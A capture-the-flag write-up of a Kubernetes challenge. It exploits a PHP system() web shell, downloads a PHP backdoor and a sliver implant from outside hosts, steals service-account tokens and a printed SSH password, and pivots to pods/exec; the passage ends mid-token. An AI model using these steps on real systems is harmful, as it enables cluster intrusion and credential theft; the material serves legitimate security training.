We are given the following information to start this kubernetes challenge:
Point your /etc/hosts for hello-world.tld to REDACTED_IP.
After you've done this "https://hello-world.tld/" will be your starting point.
Try to get full access to the master node and if you've found
the flag at the end of the challenge (look for /root/flag.txt),
please submit it at https://k8s-challenge.redguard.ch/flag?email=redacted@example.com
When visiting the website, we are greeted by the following page:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Welcome!</title>
<!-- [...] -->
</head>
<body>
<div class="frameT">
<div class="frameTC">
<div class="content">
<h2>Welcome to</h2>
<h2 class="heavy">disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr</h2>
</div>
</div>
</div>
</body>
</html>
Given the very prominent message within the text, we can find the docker image that is deployed to run the website we visited: https://hub.docker.com/r/disenchant/vulnerable-app-demo.
To look at what’s running inside, let’s pull the image and exec into a new container:
docker pull disenchant/vulnerable-app-demo:latest
docker run --rm -it disenchant/vulnerable-app-demo:latest bash
Listing the files in the current directory, we can find index.php:
root@f4c1393dbb1c:/var/www/html# ls -lah
total 136K
drwxrwxrwx 1 www-data www-data 4.0K Sep 13 2021 .
drwxr-xr-x 1 root root 4.0K Dec 11 2020 ..
-rw-r--r-- 1 root root 121K Sep 13 2021 background.png
-rw-r--r-- 1 root root 1.8K Sep 13 2021 index.php
Looking at the code, we can find this neat snippet that runs the content of the user-controlled shell GET parameter as a system command:
<?php
if ($_GET['shell']) {
echo "<pre>";
system($_GET['shell']);
echo "</pre>";
}
?>
To test if the shell works, we issue the following curl command:
curl -k https://hello-world.tld/?shell=whoami
It works! The page returns with the additional content: www-data.
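Commands containing spaces or other special characters have to be URL-encoded before they are passed through the shell parameter; for example (a small sketch, the listed path is just an illustration):
# %20 decodes to a space on the server side
curl -k "https://hello-world.tld/?shell=ls%20-lah%20/var/www/html"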
Using the env command, we list out the environment variables of the currently running container:
curl -k https://hello-world.tld/?shell=env
We can see the variables of the container mixed together with kubernetes-specific variables, like the cluster ip address of the kubernetes api server (10.96.0.1):
KUBERNETES_SERVICE_PORT=443
PHP_EXTRA_CONFIGURE_ARGS=--with-apxs2 --disable-cgi
KUBERNETES_PORT=tcp://10.96.0.1:443
APACHE_CONFDIR=/etc/apache2
HOSTNAME=disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr
PHP_INI_DIR=/usr/local/etc/php
SHLVL=0
PHP_EXTRA_BUILD_DEPS=apache2-dev
PHP_LDFLAGS=-Wl,-O1 -pie
APACHE_RUN_DIR=/var/run/apache2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_VERSION=7.2.34
APACHE_PID_FILE=/var/run/apache2/apache2.pid
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2D6021E995DC9FF8D3EE5AF27F
PHP_ASC_URL=https://www.php.net/distributions/php-7.2.34.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_URL=https://www.php.net/distributions/php-7.2.34.tar.xz
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
APACHE_LOCK_DIR=/var/lock/apache2
KUBERNETES_PORT_443_TCP_PROTO=tcp
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
PWD=/var/www/html
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
KUBERNETES_SERVICE_HOST=10.96.0.1
PHP_SHA256=409e11bc6a2c18707dfc44bc61c820ddfd81e17481470f3405ee7822d8379903
APACHE_ENVVARS=/etc/apache2/envvars
Knowing that we can now run arbitrary commands, let’s download a php backdoor that enables us to browse the file system a bit more comfortably:
curl -k https://hello-world.tld/?shell=curl%20-O%20https://gitlab.com/kalilinux/packages/webshells/-/raw/kali/master/php/php-backdoor.php
Navigating to https://hello-world.tld/php-backdoor.php?d=/var/run/secrets/kubernetes.io/serviceaccount/ allows us to access the token of the service account that is currently assigned to the running pod:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
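To decode it locally, we can base64-decode the payload segment of the token; a minimal sketch, assuming the token has been copied into the TOKEN variable and jq is installed:
# extract the payload (second dot-separated segment) and convert base64url to regular base64
payload=$(echo "$TOKEN" | cut -d '.' -f2 | tr '_-' '/+')
# pad to a multiple of four characters so base64 -d accepts it, then pretty-print with jq
while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
echo "$payload" | base64 -d | jq .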
Decoding this JWT gives us some additional information about the service account and the cluster, for example that we are currently running as restricted-viewer in the applications namespace on node hack-me-m02:
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1749218385,
"iat": 1717682385,
"iss": "https://kubernetes.default.svc.cluster.local",
"jti": "90e04604-4319-4fc7-a183-ebd125bdecf2",
"kubernetes.io": {
"namespace": "applications",
"node": {
"name": "hack-me-m02",
"uid": "4af212ee-5403-4189-be7b-a95a416d3147"
},
"pod": {
"name": "disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr",
"uid": "7b383ca9-a78c-42c1-89d4-b47b55ba1b4f"
},
"serviceaccount": {
"name": "restricted-viewer",
"uid": "de2cb0e3-f142-4377-b65d-946e1dfac16f"
},
"warnafter": 1717685992
},
"nbf": 1717682385,
"sub": "system:serviceaccount:applications:restricted-viewer"
}
Having access to the service account token is only useful if we can also reach the kubernetes api endpoint. For this, we have two options: reach the api directly from the outside if it happens to be exposed, or tunnel our requests through the compromised pod. Let’s first scan the host with nmap to determine whether a kubernetes api endpoint is reachable externally:
sudo nmap -sV hello-world.tld -p-
We can see a few interesting services running on random high ports, indicating that some services in the cluster are exposed as services of type NodePort:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-06 18:05 CEST
Nmap scan report for hello-world.tld (194.182.190.241)
Host is up (0.0081s latency).
Not shown: 65449 closed ports, 78 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
80/tcp open http nginx (reverse proxy)
443/tcp open ssl/http nginx (reverse proxy)
32769/tcp open ssl/filenet-rpc?
32771/tcp open ssl/sometimes-rpc5?
32772/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
32776/tcp open ssl/sometimes-rpc15?
32777/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
The most interesting port for us is 32769, as running curl -k https://hello-world.tld:32769 gives us the following kubernetes-api-specific error message:
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {},
"code": 403
}
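Before building a kubeconfig, we can quickly check that this endpoint accepts the stolen token at all; a sketch, again assuming the token is stored in TOKEN:
# an authenticated request against a harmless endpoint confirms the token is accepted
curl -sk -H "Authorization: Bearer $TOKEN" https://hello-world.tld:32769/version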
To connect to the newly found kubernetes api endpoint using our token, we construct a kubeconfig file:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
current-context: restricted-viewer
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
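The same access also works without a dedicated file by passing the connection details directly on the kubectl command line; a sketch:
# one-off invocation that is equivalent to the kubeconfig above
kubectl --server=https://hello-world.tld:32769 \
        --insecure-skip-tls-verify=true \
        --token="$TOKEN" \
        get pods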
Using the above kubeconfig, we can successfully connect to the cluster and start listing resources:
kubectl get all -o yaml
Looking at the result for the pod the-princess-is-in-another-namespace, we can see that it is running with the service account named pod-creator:
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
# ...
name: the-princess-is-in-another-namespace
namespace: default
# ...
spec:
containers:
- image: nginx
imagePullPolicy: Always
name: nginx-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-hrb5k
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: hack-me-m02
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: pod-creator
serviceAccountName: pod-creator
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
# ...
status:
# ...
kind: List
metadata:
resourceVersion: ""
However, as the name of the pod suggests, we can’t really do anything with the pod at the moment:
kubectl auth can-i --list
We don’t have a lot of permissions:
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
namespaces [] [] [list]
nodes [] [] [list]
pods [] [] [list]
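Still, the list permissions on namespaces and pods are enough for a broad enumeration of the cluster; for example:
# enumerate all namespaces, then list the pods across every namespace
kubectl get namespaces
kubectl get pods --all-namespaces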
Manually looking around the namespaces, we stumble across some pods in the jobs namespace:
kubectl get pods -n jobs
They look interesting:
NAME READY STATUS RESTARTS AGE
hello-28628552-smt56 0/1 Completed 0 2m51s
hello-28628553-k8tmn 0/1 Completed 0 111s
hello-28628554-tdwvp 0/1 Completed 0 51s
Let’s look at the logs of one of the pods:
kubectl logs -n jobs hello-28628554-tdwvp
We can find ssh credentials here!
Thu Jun 6 22:34:01 UTC 2024
My environment variables:
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=hello-28628554-tdwvp
SHLVL=1
HOME=/root
SSH_PASSWORD_ACCESS=true
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_SERVICE_HOST=10.96.0.1
PWD=/
SSH_PORT=2222
StrictHostKeyChecking=no
Hoping that the service openssh-server-service.applications.svc.cluster.local is exposed as a NodePort like the kubernetes api, we try to connect to the two ports that nmap previously detected as running OpenSSH 8.9p1:
ssh test-user@hello-world.tld -p 32772 # Password: s3cr3t-area41
ssh test-user@hello-world.tld -p 32777 # Password: s3cr3t-area41
Sadly, both attempts fail.
So, we really only have the option to tunnel our commands through the web application…
To do this, we can use sliver. After setting up a server, generating an implant, and running that implant on the web application pod (one way to stage it through the shell parameter is sketched after the commands below), we can task it to connect to the ssh server. Using the credentials found above, we then download the implant to the ssh service pod as well, make it executable, and run it via sliver’s built-in ssh command:
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local wget http://redacted:8080/RIPE_ZOOT-SUIT
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local chmod +x RIPE_ZOOT-SUIT
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local ./RIPE_ZOOT-SUIT
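For completeness, the very first implant on the web application pod can be staged through the same shell parameter we exploited earlier; a rough sketch (the implant name and staging URL simply mirror the commands above and are placeholders):
# fetch the implant via the web shell, make it executable and launch it in the background
curl -k "https://hello-world.tld/?shell=curl%20-O%20http://redacted:8080/RIPE_ZOOT-SUIT"
curl -k "https://hello-world.tld/?shell=chmod%20%2Bx%20RIPE_ZOOT-SUIT"
curl -k "https://hello-world.tld/?shell=nohup%20./RIPE_ZOOT-SUIT%20%26"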
Right after running the implant on the ssh service pod, we get a callback. Let’s see if it’s running as a different service account:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
We get a new token:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
Looking at the JWT, we find that we are now running as the service account pod-executer, a service account that we have not seen before:
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1749227137,
"iat": 1717691137,
"iss": "https://kubernetes.default.svc.cluster.local",
"jti": "a3c8ce76-dbb2-483e-b2ad-a96015bc2726",
"kubernetes.io": {
"namespace": "applications",
"node": {
"name": "hack-me-m02",
"uid": "4af212ee-5403-4189-be7b-a95a416d3147"
},
"pod": {
"name": "openssh-server-6d4b85f979-xhnmt",
"uid": "49cad94d-f00d-412e-83e2-c1a2cbf6cbfe"
},
"serviceaccount": {
"name": "pod-executer",
"uid": "1bc5a594-b5ea-4263-ad43-e64897dde131"
},
"warnafter": 1717694744
},
"nbf": 1717691137,
"sub": "system:serviceaccount:applications:pod-executer"
}
Let’s add the new service account to our kubeconfig:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
- context:
cluster: redguard
user: pod-executer
name: pod-executer
current-context: pod-executer
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
- name: pod-executer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
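With several contexts in one file, switching between the service accounts is just a matter of changing the current context; a sketch, assuming the file is saved as kubeconfig.yaml:
export KUBECONFIG="$PWD/kubeconfig.yaml"   # assumed file name
kubectl config get-contexts                # list the configured contexts
kubectl config use-context pod-executer    # make the new service account the default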
Let’s look at what new permissions we have:
kubectl auth can-i --list
As the name of the service account suggests, we can now use pods/exec:
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/log [] [] [get list]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Using this new permission, we can exec into the pod the-princess-is-in-another-namespace:
kubectl exec -it -n default the-princess-is-in-another-namespace -- bash
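Alternatively, the mounted token can be read with a single non-interactive exec instead of a full shell; a sketch:
# read the target pod's mounted service account token in one command
kubectl exec -n default the-princess-is-in-another-namespace -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token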
As before, we collect the service account token, which we know belongs to the pod-creator service account:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MjE2LCJpYXQiOjE3MTc2OTEyMTYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiY2YzMDNkNjEtZDI1Yy00ZGRkLTlkMzMtNWNhNWM0MzBhZWUxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiaGFjay1tZS1tMDIiLCJ1aWQiOiI0YWYyMTJlZS01NDAzLTQxODktYmU3Yi1hOTVhNDE2ZDMxNDcifSwicG9kIjp7Im5hbWUiOiJ0aGUtcHJpbmNlc3MtaXMtaW4tYW5vdGhlci1uYW1lc3BhY2UiLCJ1aWQiOiIyZGVkM2Q2Zi0xMjBhLTQ2ZmEtODYxMS1mZjYyOWZmNTdlMjIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1jcmVhdG9yIiwidWlkIjoiZmI4ZWU2NTUtYzIwMS00ZTUxLTk0YjAtMjE5MDdiZGIyOWI4In0sIndhcm5hZnRlciI6MTcxNzY5NDgyM30sIm5iZiI6MTcxNzY5MTIxNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6cG9kLWNyZWF0b3IifQ.eocZ2wPoF64CbkXIW7TRQIRpsUwP0QMfQLMixuJJDPPuq62b1JWZrmIEIZM8_di1HES1xmeuS7xCc6YaOSK-SQ94APP5cb_CUzYzzQGjn4PyVmMPSzYVYUZJI3oj2hEb4-6V8LdfnaOg8QO79uU5NdAmMDENiR3Qt-Atz4YOpWM3cngfFqiPwIGXKxHB5tjqK87CcpK2XSc8g-cm4Fe5y